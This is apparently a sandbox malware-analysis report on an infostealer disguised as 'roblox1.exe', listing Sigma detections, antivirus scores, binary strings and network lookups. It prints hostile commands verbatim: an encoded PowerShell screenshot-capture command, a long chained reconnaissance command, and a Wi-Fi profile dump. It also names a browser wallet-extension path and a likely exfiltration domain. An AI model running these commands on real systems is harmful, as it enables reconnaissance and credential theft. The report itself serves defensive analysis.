QBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA, CommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA, Comm
                  Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5224, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup administrators, ProcessId: 2788, ProcessName: net.exe
                  Sigma detected: Local Accounts Discovery
                  Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5224, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6120, ProcessName: net.exe
                  Sigma detected: Net.exe Execution
                  Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5224, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 6120, ProcessName: net.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Get-Clipboard, CommandLine: powershell.exe Get-Clipboard, CommandLine|base64offset|contains: ~Xn, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6488, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Get-Clipboard, ProcessId: 5960, ProcessName: powershell.exe
                  Sigma detected: SC.EXE Query Execution
                  Source: Process startedAuthor: frack113: Data: Command: sc query type= service state= all, CommandLine: sc query type= service state= all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5224, ParentProcessName: cmd.exe, ProcessCommandLine: sc query type= service state= all, ProcessId: 7116, ProcessName: sc.exe
                  Sigma detected: Suspicious Execution of Hostname
                  Source: Process startedAuthor: frack113: Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5224, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 5836, ProcessName: HOSTNAME.EXE
                  Sigma detected: Suspicious Network Command
                  Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\roblox1.exe, ParentImage: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, ParentProcessId: 3428, ParentProcessName: stub.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ##

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Capture Wi-Fi password
                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\roblox1.exe, ParentImage: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe, ParentProcessId: 3428, ParentProcessName: stub.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles", ProcessId: 6168, ProcessName: cmd.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exeReversingLabs: Detection: 55%
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeReversingLabs: Detection: 70%
                  Multi AV Scanner detection for submitted file
                  Source: roblox1.exeReversingLabs: Detection: 55%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: roblox1.exeJoe Sandbox ML: detected

                  Phishing

                  barindex
                  Overwrites the password of the administrator account
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                  Source: roblox1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptography_rust.pdbc source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\buffer\buffer.cBUF_MEM_growBUF_MEM_grow_cleancompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap` source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301567000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1953260784.00007FFBA9EE5000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_uuid.pdb source: stub.exe, 00000003.00000002.1965068421.00007FFBBBE92000.00000002.00000001.01000000.00000020.sdmp
                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: roblox1.exe, 00000000.00000003.1539994673.000001B3013F1000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1954163213.00007FFBAA16F000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\python3.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945909540.00000213BE720000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1965877888.00007FFBBC260000.00000002.00000001.01000000.00000007.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: stub.exe, 00000003.00000002.1964238411.00007FFBBB553000.00000002.00000001.01000000.00000025.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: stub.exe, 00000003.00000002.1964051788.00007FFBBAF4C000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1961361267.00007FFBAAD33000.00000002.00000001.01000000.00000005.sdmp
                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: roblox1.exe, 00000000.00000003.1539994673.000001B3013F1000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1954163213.00007FFBAA16F000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: k1k2k3X9_62_PENTANOMIALp.otherp.onBasisp.tpBasisp.ppBasismX9_62_CHARACTERISTIC_TWOp.primep.char_twofieldTypeX9_62_FIELDIDX9_62_CURVEfieldIDcurvebaseECPARAMETERSvalue.named_curvevalue.parametersvalue.implicitlyCAECPKPARAMETERSprivateKeyparameterspublicKeyEC_PRIVATEKEYec_asn1_group2fieldidcrypto\ec\ec_asn1.cec_asn1_group2curveEC_GROUP_get_ecparametersEC_GROUP_get_ecpkparametersEC_GROUP_new_from_ecparametersEC_GROUP_new_from_ecpkparametersi2d_ECPKParametersd2i_ECPrivateKeyi2d_ECPrivateKeyi2d_ECParametersd2i_ECParameterso2i_ECPublicKeyi2o_ECPublicKeycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Tue Sep 3 19:22:24 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1963452510.00007FFBB5C17000.00000002.00000001.01000000.00000015.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1966370178.00007FFBBC9F3000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1952475865.00007FFBA9E5C000.00000002.00000001.01000000.00000019.sdmp
                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: roblox1.exe, 00000000.00000003.1539994673.000001B301567000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1953260784.00007FFBA9EE5000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: stub.exe, 00000003.00000002.1963629139.00007FFBB5CBD000.00000002.00000001.01000000.00000012.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptography_rust.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: stub.exe, 00000003.00000002.1965708695.00007FFBBC246000.00000002.00000001.01000000.00000018.sdmp
                  Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: stub.exe, 00000003.00000002.1954163213.00007FFBAA1F1000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\pyexpat.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp

                  Spreading

                  barindex
                  Performs a network lookup / discovery via ARP
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior

                  Networking

                  barindex
                  Uses netstat to query active network connections and open ports
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: unknownDNS query: name: ip-api.com
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.10 aiohttp/3.10.5
                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                  Source: global trafficDNS traffic detected: DNS query: restores.name
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
